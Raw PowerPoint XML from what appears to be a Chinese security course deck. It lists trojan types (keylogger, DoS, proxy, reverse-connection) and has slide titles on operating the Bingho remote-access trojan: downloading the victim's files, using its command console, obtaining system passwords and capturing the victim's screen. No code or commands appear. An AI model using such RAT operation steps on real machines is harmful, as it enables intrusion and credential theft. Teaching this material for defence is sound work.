              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>键盘记录木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代理木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反弹端口型木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4081827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0486">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2048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2048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0486">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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20486">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>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20486">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>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20486">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>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20486">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>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20486">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="40" presetID="55" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20486">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2048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6" grpId="0" uiExpand="1"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81" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件管理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>下载文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126982" name="Picture 4" descr="8_2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1200150" y="1290638"/>
            <a:ext cx="7273925" cy="4932362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179591425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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河的使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>续</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128006" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477838" y="1477963"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令控制台标签</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，可以看到这里有众多的功能。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1861212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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>冰河的命令控制台 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129030" name="Picture 5" descr="8_3_1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1028700" y="1303338"/>
            <a:ext cx="7343775" cy="5002212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35324437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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>获得系统信息和口令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130054" name="Picture 4" descr="8_3_2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1038225" y="1184275"/>
            <a:ext cx="7200900" cy="5108575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12602542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7" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>捕获对方屏幕</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="131078" name="Picture 4" descr="8_21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1076325" y="1271588"/>
            <a:ext cx="7129463" cy="5068887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190594798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01" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>向对方发送信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="132102" name="Picture 5" descr="8_4bmp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1211263"/>
